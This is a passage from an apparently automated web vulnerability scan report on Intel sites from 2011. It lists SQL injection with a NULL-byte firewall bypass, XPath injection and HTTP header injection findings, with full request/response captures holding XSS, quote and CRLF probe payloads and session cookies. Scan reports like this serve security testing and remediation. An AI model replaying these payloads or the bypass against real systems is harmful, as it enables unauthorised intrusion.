%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; 
wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:37 GMT
Server: Omniture DC/2.0.0
xserver: www616
Content-Length: 0
Content-Type: text/html


1.4. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www91.intel.com
Path:   /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562%00'?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; 
wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:15:19 GMT
Server: Omniture DC/2.0.0
Content-Length: 462
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562%00''?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; 
wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:15:19 GMT
Server: Omniture DC/2.0.0
xserver: www652
Content-Length: 0
Content-Type: text/html


2. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://inside.intel.com
Path:   /LOPSPFeedMashup

Issue detail

The SIP parameter appears to be vulnerable to XPath injection attacks. The payload " was submitted in the SIP parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /LOPSPFeedMashup?ON=runMashup&SN1=LOPMASHUP11&SN2=LOPMASHUP07A&SN3=LOPMASHUP07B&SN4=LOPMASHUP07C&STARTINDEX=1&COUNT=10&SIP=keyword=" HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947561739; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=%5B%5BB%5D%5D; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=328040 t=1296956941185767
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43153
Expires: Sun, 06 Feb 2011 13:49:26 GMT
Date: Sun, 06 Feb 2011 01:50:13 GMT
Connection: close
Content-Length: 158

Error execution Mashup Script : Error filtering data : XPath syntax error at char 50 in {...(lower-case(.),lower-case("...}:
Unmatched quote in expression

3. HTTP header injection
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fca4d%0d%0a5ca15ea1dbf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-264110fca4d%0d%0a5ca15ea1dbf/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110fca4d
5ca15ea1dbf

Content-Length: 207
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110fca4d
5ca15ea1dbf">he
...[SNIP]...

3.2. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4792a%0d%0a0de4dd1da6c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-2641364792a%0d%0a0de4dd1da6c/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-2641364792a
0de4dd1da6c

Content-Length: 227
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-26413647
...[SNIP]...

3.3. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 225ee%0d%0a86d51e0577b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-264138225ee%0d%0a86d51e0577b/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:17 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138225ee
86d51e0577b

Content-Length: 215
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138225ee
86d51e0
...[SNIP]...

3.4. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bdcbc%0d%0a501e00af3ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-264171bdcbc%0d%0a501e00af3ac/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:16 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171bdcbc
501e00af3ac

Content-Length: 205
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171bdcbc
501e00af3ac">here
...[SNIP]...

3.5. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d4e32%0d%0a457ea5750ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-264172d4e32%0d%0a457ea5750ac/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:17 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172d4e32
457ea5750ac

Content-Length: 190
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172d4e32
457ea5750ac">here</a>

3.6. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e2a8c%0d%0a47f57a11cd1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-258152-c1-264090e2a8c%0d%0a47f57a11cd1/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:19 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090e2a8c
47f57a11cd1

Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2
...[SNIP]...

